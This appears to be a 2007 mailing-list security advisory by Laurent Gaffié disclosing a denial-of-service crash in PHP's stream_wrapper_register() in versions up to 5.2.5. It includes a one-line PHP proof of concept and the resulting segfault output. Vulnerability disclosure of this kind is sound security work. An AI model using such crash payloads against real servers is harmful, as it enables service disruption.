PHP <= 5.2.5 stream_wrapper_register() denial of service

laurent . gaffie Tue, 13 Nov 2007 11:15:06 -0800

Application: PHP <= 5.2.5

Web Site: http://php.net


Platform: unix

Bug: Denial of service

fonction: stream_wrapper_register()

special condition: default php-memory-limit

-------------------------------------------------------


1) Introduction

2) Bug

3) Proof of concept

4) Greets

5) Credits

===========

1) Introduction

===========


"PHP is a widely-used general-purpose scripting language that

is especially suited for Web development and can be embedded into HTML."


======

2) Bug

======


stream_wrapper_register() is vulnerable to a denial of service


=====

3)Proof of concept

=====


Proof of concept example :


<?php

stream_wrapper_register("hi",str_repeat("A",8477000));//let's make sure we 
trigger it !

?>


result:

[EMAIL PROTECTED]:~/Desktop# php shot.php

Erreur de segmentation (core dumped)

[EMAIL PROTECTED]:~/Desktop#


========

4)Greets

========

Benjilenoob, Ivanlef0u, la team soh, #futurezone, #soh


=====

5)Credits

=====

laurent gaffié

PHP <= 5.2.5 stream_wrapper_register() denial of service

Reply via email to